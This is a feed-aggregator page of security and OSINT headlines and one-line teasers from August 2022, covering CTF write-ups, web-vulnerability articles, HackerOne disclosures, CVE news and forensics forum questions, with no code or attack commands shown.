    Казнь в Еленовке (анатомия провокации)
    Давайте попробуем проанализировать хронолигию событий, то что известно на данный момент, а потом делать выводы. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — wagthetail
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — choochoo
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — Growing Up
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — VOTE FOR ME
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    Top 10 most rated OSINT Tools on Github
    author — SATYAM PATHANIA Continue reading on Medium »
  • Open

    Getsimple CMS 3.3.10 Exploit
    Hallo kembali lagi dengan saya pada kesempatan kali ini saya ingin menunjukkan dokumentasi exploitasi Getsimple CMS 3.3.10. Continue reading on Medium »
    Introduction Session Hijacking
    Session hijacking is defined as taking over an active TCP/IP communication session without the user’s permission. When implemented… Continue reading on Medium »
    Practical XPath Injection : Attack and Defense Techniques
    Practical XPath Injection Exploits Continue reading on Medium »
    XXE Attack : Real life attacks and code examples
    XXE (XML External Entity Injection) is a web-based security vulnerability that enables an attacker to interfere with the processing of XML… Continue reading on Medium »
    Bug Bounty — What, How, Why?
    Getting started with bug bounties Continue reading on Medium »
    How To Write A Penetration Testing Report
    A Penetration testing report is the only tangible product. Continue reading on Medium »
    How I got a $10,000 Penetration Testing Project/Job with Bug Bounty
    Introduction: Continue reading on Medium »
    Everything you need to know about Cyber Security:
    Cybersecurity is the protection of Internet-connected systems such as hardware, software, and data from cyber threats. Individuals and… Continue reading on Medium »
    2FA Bypass via Google Identity & OAuth Login
    Hello All, Continue reading on Medium »
    CodeShield: Cloud Asset Inventory & Privilege Escalation Toolkit
    Hello everybody! In this blog post, we will go through a Cloud Security Tool, I recently came across: Codeshield. Continue reading on Medium »
  • Open

    Containers Vulnerability Scanner: Trivy
    This article talks about Trivy, which is a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continuous Integration and Testing. Table The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
  • Open

    Containers Vulnerability Scanner: Trivy
    This article talks about Trivy, which is a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continuous Integration and Testing. Table The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
  • Open

    We always win
    [link] [comments]
  • Open

    open ports forensics
    hey there, if you get suspicious from attacker in your computer from download some "free" software, how can i see the history of open ports and traffic to another computer from the day i downloaded the software ? submitted by /u/ArticleUseful211 [link] [comments]
    Recovering emojis from Android Cellebrite extraction?
    Working with analysts on an Android mobile extraction. Emojis are coming up as question mark wingdings in SMS/MMS conversations. Analysts are telling me that there's no way to get that information from Android extractions, only iOS. This doesn't sound right to me. Is there advice I can give them regarding how retrieve the emoji data? submitted by /u/md9918 [link] [comments]
    What are some more CS - Research oriented jobs?
    This is a fascinating field to work into, even from an IT perspective (not looking down upon it, it just may get repetitive for some after a while), however we don't frequently see more high-end/research oriented roles being talked about in the sub. Apart from malware analysis/reverse engineering, what are some other opportunities to work for in the digital forensics field? Or what about jobs not necessarily pertaining to OS forensics? One example I have read about would be development of tools for media forensics. One in particular is about extracting ENF from videos/audio recordings to determine the location where it was captured. Sounds cool! In case you want to read more: https://arxiv.org/pdf/1912.09428.pdf https://arxiv.org/pdf/1903.09884.pdf https://en.wikipedia.org/wiki/Electrical_network_frequency_analysis Certainly this is an already niche field among CS but are the aforementioned roles even more niche to the extent that they exist only in academic context? submitted by /u/FF6B9EAD [link] [comments]
    GCFA - Study Tips
    I’m having a hard time studying RDP event IDs. Basically the entire IR part of Event IDs with different scenarios is giving me trouble. Any tips? How to best prepare for Book 2 of GCFA (Intrusion Analysis) submitted by /u/bigpoppaash [link] [comments]
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    SecWiki News 2022-08-07 Review
    浅谈开源软件供应链风险 by ourren XSS in Gmail's Amp4Email by ourren [HTB] Europa Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-07 Review
    浅谈开源软件供应链风险 by ourren XSS in Gmail's Amp4Email by ourren [HTB] Europa Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    UX Research Around Active Directory Security
    Hello everyone, I'm a User Experience Designer in a large security company that's currently building a product around identity security, including Active Directory and Azure AD. As I conduct my research, I try to determine how many domains an organization usually has (in varying scales, of course). How are they managed? Is there a team that manages specific domains across all forests? Does one team usually take care of all the domains and not care about the others? The purpose of this question is to understand if the user needs the option to toggle between domains rather than simply filtering data by "Domain Name". If you have any other comments regarding how you manage your domain security in your organization, it would be appreciated. Thank you very much! submitted by /u/RaspberryFair8362 [link] [comments]
  • Open

    Fuzzing in Go
    “Fuzz testing is a novel way to discover security vulnerabilities or bugs in software applications.” The concept of fuzzing was introduced… Continue reading on Better Programming »
  • Open

    Fuzzing in Go
    “Fuzz testing is a novel way to discover security vulnerabilities or bugs in software applications.” The concept of fuzzing was introduced… Continue reading on Better Programming »
  • Open

    Lots of free PDFs and other files on various subjects
    I found a link to someone's library on the internet. https://cdn.preterhuman.net/texts/ submitted by /u/ConstProgrammer [link] [comments]
    AC School
    submitted by /u/EGirlCollector [link] [comments]
  • Open

    Good one but severity of this kind of attack is very low.
    Continue reading on Medium »
  • Open

    HTTP PUT method is enabled downloader.ratelimited.me
    RATELIMITED disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/545136
    Anonymous access control - Payments Status
    Omise disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1546726 - Bounty: $100
  • Open

    Phoenix Challenges -- Stack Zero
    Have been waiting for school to end for some time now to finally get back to exploit development. Finally got around to making my first exploit development writeup and wanted to share with the community. Looking forward to many more! https://secnate.github.io/ctf/phoenix/phoenix-stack-zero/?fbclid=IwAR1-XbyPP9rSrLArmTPqXNb1Tkfj_7E8_Qi3XFvaexEyZJPcuA1J_YeYkj8 Of course, any comments/feedback would be greatly appreciated! submitted by /u/ProgrammingBro123 [link] [comments]

  • Open

    Enterprise: Active Directory Room From TryHackMe
    You just landed in an internal network. You scan the network and there’s only the Domain Controller… Continue reading on InfoSec Write-ups »
    Php Object Injection Demo
    PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks… Continue reading on Medium »
    Web Application Reconnaissance Guide, Cybersec | Shubham Dhungana
    In this article, I’m going to document about the process to perform web application reconnaissance. Before reading this article, we must… Continue reading on Medium »
    PHP Object Injection
    A very common and critical vulnerability in PHP applications is PHP Object Injection. This blog post explains how they work and how they… Continue reading on Medium »
    Unsafe use of Reflection
    This vulnerability is caused by unsafe use of the reflection mechanisms in programming languages like Java or C# Continue reading on Medium »
    File Inclusion Demo
    This script is possibly vulnerable to file inclusion attacks. Continue reading on Medium »
    Code Injection
    Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application… Continue reading on Medium »
    Bypassing File Type Filters
    Unrestricted File Upload — File Extension Filter Bypass Continue reading on Medium »
    Bypassing Directory Structure Filters
    Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on… Continue reading on Medium »
    Bypassing Filename Filters Demo
    One of the challenging factors to a Hacker in a web application attack is the file upload. The first step in every attack is to get some… Continue reading on Medium »
  • Open

    Windows Registry Standards?
    I'm using regshot to compare two registry snapshots against each other. Is there a standard for how to navigate around the potentially hundreds of registry changes that all look at the same to a beginner? submitted by /u/Jaruki_Jurakami [link] [comments]
    Which Wireshark book do you recommend?
    Hey there. I'm interested in learning Wireshark in my off-time from work, and I am trying to increase my time off screen, as I'm sure many of you stare at computers all day for work like me. So I'm looking for a physical book on Wireshark and packet analysis. There are a handful of well-reputed options on Amazon, but the budget's tight. Anyone read and would recommend any particular one of the well-known Wireshark books, like Wireshark 101 or Practical Packet Analysis? The reviews are all positive so it's tough to make a choice here. Many thanks. submitted by /u/DataMoreLikeShplada [link] [comments]
    Does HTTPS Basically Make Personal VPNs Useless for Security?
    Question says it all I'm currently going through my CCNP ENCOR, and covering IPSec in the Overlay Tunnels chapter IPSec typically has 2 modes: transport and tunnel Tunnel mode encrypts the ENTIRE packet, but requires dedicated endpoints - something that normies aren't going to have Transport mode encrypts only the payload (i.e. personal data), but keeps all the original header information (ports and IP addresses) However, HTTPS already encrypts the payload of network traffic. And a huge chunk of traffic hitting the internet (not just web traffic) is HTTP-based So would that not mean that - from a security perspective - personal (aka Transport) VPNs are basically useless? I understand the benefit of circumventing region locking for purposes of watching normally off-limits content (i.e. Netflix), but my question here is solely based on the security perspective Many thanks for any input submitted by /u/lfionxkshine [link] [comments]
  • Open

    Weekly quiz covering 10 interesting infosec stories or events from the past week
    submitted by /u/jaco_za [link] [comments]
    Kanye West's Stem Player - An engineering disaster
    submitted by /u/krystalgamer [link] [comments]
    nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)
    submitted by /u/Gallus [link] [comments]
  • Open

    RCE vulnerability in Hyperledger Fabric SDK for Java
    Hyperledger disclosed a bug submitted by freskimo: https://hackerone.com/reports/801370 - Bounty: $200
    Enrolling to a CA that returns an empty response crashes the node process
    Hyperledger disclosed a bug submitted by mttrbrts: https://hackerone.com/reports/506412 - Bounty: $500
    Brute Force of fabric-ca server admin account
    Hyperledger disclosed a bug submitted by xiaoc: https://hackerone.com/reports/411364 - Bounty: $1500
    cross site scripting in : mtn.bj
    MTN Group disclosed a bug submitted by alimanshester: https://hackerone.com/reports/1264834
    Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token
    Kubernetes disclosed a bug submitted by gaffy: https://hackerone.com/reports/1382919 - Bounty: $2500
  • Open

    SecWiki News 2022-08-06 Review
    Kaggle知识点:时序预测基础知识 by ourren 安全控制有效性验证的发展趋势浅论 by ourren [HTB] Haircut Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-06 Review
    Kaggle知识点:时序预测基础知识 by ourren 安全控制有效性验证的发展趋势浅论 by ourren [HTB] Haircut Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    What is OSINT
    We have been trying to find someone online, specifically perhaps by using an email address, or username. Here the use of OSINT comes. Continue reading on Medium »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How i was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How i was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How i was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Drop your favorite resource for exploit dev
    I want to start learning exploit dev, if you guys can help me with it or drop in your favorite resource that helped you get where you are, it would be great! If someone has time and would like to answer a few questions, it would help me a lot too. submitted by /u/National_Concern2361 [link] [comments]
  • Open

    Pocsuite3: An open-sourced remote vulnerability testing framework
    Article URL: https://github.com/knownsec/pocsuite3 Comments URL: https://news.ycombinator.com/item?id=32365622 Points: 1 # Comments: 0
  • Open

    常用的30+种未授权访问漏洞汇总
    覆盖了目前网络资讯上公布的30+种常见的未授权访问漏洞
  • Open

    game images
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The Mythical Container net.core.somaxconn (2022)
    TL; DR Try to answer several quick questions with a long post: On creating a pod in Kubernetes, if somaxconn is not specified, what the default value will be, and who will set it? If changing node’s sysctl settings, will they be propagated to pods? Are all sysctl parameters are equal in terms of initialization and propagation? TL; DR 1 Background 1.1 Journey of components when creating a pod 1.2 sysctls in container and unsafe sysctls in k8s 1.3 The net.core.somaxconn parameter of pods/containers 1.4 Problem statement 2 Dig inside 2.1 kube-apiserver -> kubelet 2.2 kubelet -> dockerd 2.3 Skip k8s/kubelet/cni: create container right from docker 2.4 Skip docker: create container right from containerd Find the right containerd.sock file Pull image Create a container Check the …

  • Open

    Process Injection
    Whenever we’ll get a reverse shell, it’s mostly is spawned by creating a new separate process, if that process gets killed, could be… Continue reading on Medium »
  • Open

    Automate SQLiDetector Hacking Tool
    completely automate SQLI-Injection detector hacking tool Continue reading on Medium »
    Hacking a company from a phone
    This story is a tale from my job around being able to fully compromise a server whilst only having my phone accessible to me. Continue reading on Medium »
    Irremovable guest in facebook event — Facebook bug bounty
    Hello Everyone, This is Rajiv Gyawali from Butwal, Nepal. This is a story of one of my finding on facebook. Continue reading on Medium »
    Orderby Limit Sql
    Introduction to SQL Limit Order By The limit clause in Mysql is used to restrict the number of the rows retrieved in the resultset of the… Continue reading on Medium »
    Web Security Academy — OS command injection, simple case
    This challenge is from the Web Security Academy by Portswigger. It is under the category “OS command injection”. After starting the lab… Continue reading on Medium »
    Bypassing Blacklists CTF In Kali Linux
    Continue reading on Medium »
    Automated Tools Sql NINJA
    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking… Continue reading on Medium »
    Error Based Sql Injection
    What Is Error-Based SQL Injection? Continue reading on Medium »
    Double Blind Sql Injection
    SQL Injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit… Continue reading on Medium »
    How Blind SQL Injection Works
    Blind SQL injection is a type of SQL injection attack where the attacker indirectly discovers information by analyzing server reactions to… Continue reading on Medium »
  • Open

    Fix : (Security) Mitigate Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1635321 - Bounty: $200
  • Open

    Chrome 105 Beta: Custom Highlighting, Fetch Upload Streaming, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 105 is beta as of DATE. You can download the latest on Google.com for desktop or on Google Play Store on Android. Custom Highlight API The Custom Highlight API extends the concept of highlighting pseudo-elements by providing a way to style the text of arbitrary ranges, rather than being limited to the user agent-defined ::selection, ::inactive-selection, ::spelling-error, and ::grammar-error. This is useful in a variety of scenarios, including editing frameworks that wish to implement their own selection, find-in-page over virtuali…
  • Open

    How Passwordless Works
    Passwordless is a form of authentication that doesn't require users to provide passwords during login. That much you could glimpse from the name, but how does it work? What are its trade-offs? This blog post will do its best to explain to you how passwordless can be implemented using modern technologies such as Web Authentication (WebAuthn), while at the same time providing better user experience and security than the traditional password-based approach. submitted by /u/Blakebvhjjdd [link] [comments]
    Repository of Adversarial Tactics That is Updated Daily
    submitted by /u/entropydaemon8 [link] [comments]
    New Era of Phishing Payloads After The Deprecation of Macros
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering Windows Printer Drivers (Part 1)
    submitted by /u/sanitybit [link] [comments]
    Exploiting a Linux kernel Use-After-Free in io_uring
    submitted by /u/awarau888 [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 3 - Radio communications
    submitted by /u/0xdea [link] [comments]
    Abusing container mount points and symlinks on MikroTik's RouterOS to gain code execution
    submitted by /u/crower [link] [comments]
    fwd:cloudsec 2022 Conference Talk Recordings
    submitted by /u/sanitybit [link] [comments]
  • Open

    Why do you do Exploit Dev?
    Before I start this I want to preface that I am genuinely curious and not trying to start a argument over programming languages and what not but why do you all want do exploit development? As far as I understand it (which is possibly incorrect) developing exploits are starting to become a thing of the past with much more "safe" languages and mitigations being implemented and software becoming much more safe. Now this may be a scathing hot take but is there a bit of truth to it? I like the idea of Exploit Dev and I would love to know what you guys opinions/why you do what you do. I want to get into Exploit Dev but I don't think as a career but as a cool hobby that would be cool to talk about. ​ Thanks for reading submitted by /u/Synosis1 [link] [comments]
  • Open

    CVE-2022-29582 – An io_uring vulnerability
    Article URL: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/ Comments URL: https://news.ycombinator.com/item?id=32359814 Points: 4 # Comments: 0
    CVE-2022-29154 – rsync exploit
    Article URL: https://docs.ssh-mitm.at/CVE-2022-29154.html Comments URL: https://news.ycombinator.com/item?id=32353570 Points: 2 # Comments: 0
  • Open

    CVE-2022-29582 – An io_uring vulnerability
    Article URL: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/ Comments URL: https://news.ycombinator.com/item?id=32359814 Points: 4 # Comments: 0
    High-impact vulnerability in DrayTek routers leaves thousands of SMEs open to
    Article URL: https://portswigger.net/daily-swig/high-impact-vulnerability-in-draytek-routers-leaves-thousands-of-smes-open-to-exploitation Comments URL: https://news.ycombinator.com/item?id=32356636 Points: 1 # Comments: 0
    Slack Serious Vulnerability: Invite Link Function
    Just received this in my inbox: We are writing to let you know about a bug we recently discovered and fixed in Slack's Shared Invite Link functionality. This feature allows you to create a link that will permit anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because you created and/or revoked one of these links for your workspace between April 17, 2017 and July 17, 2022. We'll go into detail about this security issue below. Important things first, though: We have no reason to believe that anyone was able to obtain your plaintext password because of this vulnerability. However, for the sake of caution, we have reset your Slack password. You will need to set a new Slack password before…
  • Open

    War in Ukraine / August 4
    Day 163: The Kharkiv direction is another difficult point for the Russian Federation Continue reading on Medium »
    An Interview with a Private Investigator and OSINT master
    Chatting with OhShINT Continue reading on Medium »
  • Open

    SecWiki News 2022-08-05 Review
    攻防演练第四年的一些碎碎念 by ourren MSF多层内网渗透全过程 by ourren 数据传输安全白皮书 by ourren 美国关键基础设施网络防御路线发展与调整 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-05 Review
    攻防演练第四年的一些碎碎念 by ourren MSF多层内网渗透全过程 by ourren 数据传输安全白皮书 by ourren 美国关键基础设施网络防御路线发展与调整 by ourren 更多最新文章,请访问SecWiki
  • Open

    How do you analyze a possible "drive by" download incident?
    Or is it something else entirely? [Paraphrasing here] I received a panicked call from a friend the other day. Intending to go to fivethirtyeight.com, she'd instead typed in .org. This took her to a page (safety-search dot com) that was prompting her to download their "yahoo team developed" browser plugin to help her with safe searches. She didn't click on anything and, when she got back to her screen with phone in hand, her browser had gone to fivethirtyeight.com. There were no malware protection software notifications of any kind anywhere in the process. Did something already happen by then, even if she didn't click on anything? What's the best way to look at this type of incident to figure out what might or might not have happened? submitted by /u/arnach [link] [comments]
  • Open

    How to analyze Linux malware – A case study of Symbiote
    https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ submitted by /u/CyberMasterV [link] [comments]
    Linux Forensics Scenario
    Good morning /r/computerforensics I've got a hypothetical scenario I'd like to run by you - I've got a Ubuntu VM. Suppose I create a partition, write files to that partition, and then delete the partition. How would I image the VM to obtain the disk slack that contained that partition? Do VMs even contain disk slack? How about if I have partition sda, sdb, and sdc, aside from the naming convention, if I deleted sdb, any tips on identifying that there was once sdb (using a tool like sleuthkit)? Thank you for your time and mental cycles :) submitted by /u/DeadBirdRugby [link] [comments]
    Remote Forensic Imaging
    Hello everyone! I've to create a forensics image from a dedicated server hosted on OVH. Any suggest? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    APT32组织针对我国关基单位攻击活动分析
    APT32海莲花组织作为有国家背景支持的顶尖黑客团伙。
    FreeBuf早报 | 阿里巴巴称互联公司正减缓云支出;远程木马Woody瞄准俄罗斯实体
    在阿里巴巴2022 Q2财报电话会议上,高管们谈到了“互联网行业减速”,这阻碍了阿里云的增长。
    谨防勒索病毒对工控网络的危害
    勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。
    柬埔寨数据合规重点解读
    近年来,柬埔寨非常重视数字经济发展,颁布了《电子商务法》,并将外国电商企业纳入简化增值税登记机制。
    新型Linux僵尸网络RapperBot暴力破解SSH服务器
    研究人员发现了一种新型物联网(IoT)僵尸网络“RapperBot”,自2022年6月中旬以来就一直处于活动状态。
    FreeBuf周报 | 澳大利亚隐私监管机构调查TikTok;印度废除数据保护法;区块链行业遭供应链攻击重创
    澳大利亚隐私监管机构正调查 TikTok,TikTok 称报告存在多处错误,并“存在对移动应用根本性的误解”。
    【深度】OpenSea 新协议 Seaport源码解析
    近期,NFT 市场 OpenSea 宣布推出全新 Web3 市场协议 Seaport 协议,用于安全高效地买卖 NFT。本文将深度分析其关键业务实现和接口实现。
    记一次非法网站渗透
    本篇文章原文在我的个人公众号(ZAC安全)中,部分有争议的内容已修改。
    印度政府宣布撤回本国数据保护法案
    8月3日,印度电子和信息技术国务部长Rajeev Chandrasekhar宣布,于2019年颁布的《数据保护法案》已正式撤回。
    过去一年里,游戏行业的网络攻击爆增167%
    网络安全公司Akamai发布了最新的报告。
    DrayTek爆出RCE漏洞,影响旗下29个型号的路由器
    研究人员发现一个严重的远程代码执行漏洞,会对29种型号的DrayTek Vigor商业路由器产生严重影响。
    德国工商总会被网络攻击打爆了
    网络攻击组织盯上了 DIHK,对其发起了大规模的网络攻击。DIHK无力面对如此强力的网络攻击,直接躺平。
    Solana被盗500万美元,具体原因尚不明确
    攻击者从区块链平台Solana窃取了超过500万美元,具体的失窃原因仍在进一步调查中调查中。
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview

  • Open

    Elastic Open Sources Their Endpoint Security Protection YARA Ruleset
    submitted by /u/sanitybit [link] [comments]
    Azure Threat Research Matrix
    submitted by /u/sanitybit [link] [comments]
    HyperDbg: Reinventing Hardware-Assisted Debugging
    submitted by /u/sanitybit [link] [comments]
    Sharpening Your Tools: Updating bulk_extractor for the 2020s
    submitted by /u/sanitybit [link] [comments]
    Cloudflare Implements Experimental Support for Post-Quantum Cryptography
    submitted by /u/sanitybit [link] [comments]
    Exploring the SameSite cookie attribute for preventing CSRF!
    submitted by /u/macropng [link] [comments]
    How To Implement JSON Web Token (JWT) in Java Spring Boot
    submitted by /u/sanitybit [link] [comments]
    Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
    submitted by /u/ly4k_ [link] [comments]
    QNAP Poisoned XML Command Injection (Silently Patched)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Tool that automates the tedious process of searching leaks through format string vulnerabilities. It will allow you to find stack leaks, pie leaks and canary leaks, in each case indicating the payload that provides the leak.
    submitted by /u/Diego-AltF4 [link] [comments]
    Building did someone clone me: a free service that notifies its users when their website is cloned and used in a phishing attack
    submitted by /u/wez32 [link] [comments]
    Risky Business: Determining Malicious Probabilities Through ASNs
    submitted by /u/sanitybit [link] [comments]
    PersistenceSniper: Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines by @last0x00
    submitted by /u/last0x00 [link] [comments]
    Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers
    submitted by /u/Gallus [link] [comments]
  • Open

    Server Side Template Injection-Something Distinct!
    How’s it going guys! My name is Sagar Sajeev and this is my writeup about one of my recent SSTI (Server Side Template Injection) finding. Continue reading on Medium »
    Finding internal ip for big organization
    I have found a way to find internal ip for big organization(for example twitter, linkedin etc).The way to do that is very simple. Continue reading on Medium »
    The Instacart Bug Bounty Program - How We Work with White Hat Hackers to Secure Instacart
    Authors: James Cha, Vickie Li, Shashank Mirji, and Frank Filho Continue reading on tech-at-instacart »
    Authentication Bypass
    When performing a penetration test of an application, tests against the authentication mechanism are always an important check. While a… Continue reading on Medium »
    DBMS Detection Of Sql Injection
    In this article, we will learn about DBMS Injection. Continue reading on Medium »
    Protection Strategies Sql Injection
    SQL injections are one of the most utilized web attack vectors used with the goal of retrieving sensitive data from organizations. Continue reading on Medium »
    Finding SQL Injection Manually
    SQL injection is a code injection technique used to hack websites, attack data applications, destroy databases by inserting malicious SQL… Continue reading on Medium »
    SS7 Practical Video From Pentester Club
    Signaling System 7 (SS7) is an architecture for performing out-of-band signaling in support of the call-establishment, billing, routing… Continue reading on Medium »
    what is footprinting in hacking || types of footprinting || Pentester Club
    Footprinting is an ethical hacking technique used to gather as much data as possible about a specific targeted computer system, an… Continue reading on Medium »
  • Open

    “Liberators” vs “Occupiers”: the importance of subtle propaganda
    I defend Lakoff’s idea that propaganda is about how one frames an issue by looking at media coverage of the Russian invasion of Ukraine. Continue reading on Medium »
    How To Track An Individual On Social Media Using OSINT — Part 3.2
    Hiillo Folks! I hope you liked my OSINT series. In this blog, we will discuss some professionals and undercover techniques to track anyone… Continue reading on Medium »
    War in Ukraine / August 3
    Day 162: Mykolaiv will not be forcibly evacuated Continue reading on Medium »
    Orwell is here now. He’s livin’ large.
    Well.. let's start this story back at the beginning! I am not a hacker but Angelina Jolie circa ’95 was my first love and I have seen the… Continue reading on Medium »
  • Open

    Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability
    Reddit disclosed a bug submitted by high_ping_ninja: https://hackerone.com/reports/1658418 - Bounty: $5000
    Unauthenticated Private Messages DIsclosure via wordpress Rest API
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1590237 - Bounty: $350
    Sensei LMS IDOR to send message
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1592596 - Bounty: $100
    Unrestricted File Upload Blind Stored Xss in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by mrzheev: https://hackerone.com/reports/1577370 - Bounty: $250
  • Open

    Is there any getting around Deep Freeze?
    Has anyone encountered Deep Freeze, and know if there's a way around its "reboot to restore" ability? submitted by /u/greyyit [link] [comments]
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Why is there such a big difference in company response time to vulnerabilities?
    I know that each company has different procedures and practices, but as a student to cybersecurity, I'm struggling to understand why some large companies struggle to patch vulnerabilities while others can with ease. To illustrate this example, We'll look at CVE-2022-0778 (Publicized March 15th, 2022). An OpenSSL vulnerability that was in a bug on the BN_mod_sqrt() function, if served as a maliciously crafted cert to parse, it would enter an infinite loop. The vulnerability then impacts a bunch of different scenarios such as Denial of Service, TLS servers consuming client certs, TLS servers consuming client certs, taking private keys from customers, etc. Looking through the vulnerability reports and responses, I saw that each cybersec company responded to the vulnerability differently. Some were able to patch it fast, while others still haven't come up with a fix For instance, PAN deployed a patch 39 days after the publication, Check Point deployed one in 2-3 days, but companies like Fortinet + Cisco still haven't announced a patch yet. My main question is if it's considered "High Severity", then why would some companies still not have it patched? Thanks. submitted by /u/Beginning_Actuary_54 [link] [comments]
    Missing Firmware Files
    I am attempting to install AlienVault OSSIM on a new server but I can not get past this error. I can not find this bin file online. Would anyone be able to link to to a place that I can download this firmware file? submitted by /u/SOSicearrow [link] [comments]
    Drive-By-Downloads: How does malware "leave" the browser to attack the OS, software, etc?
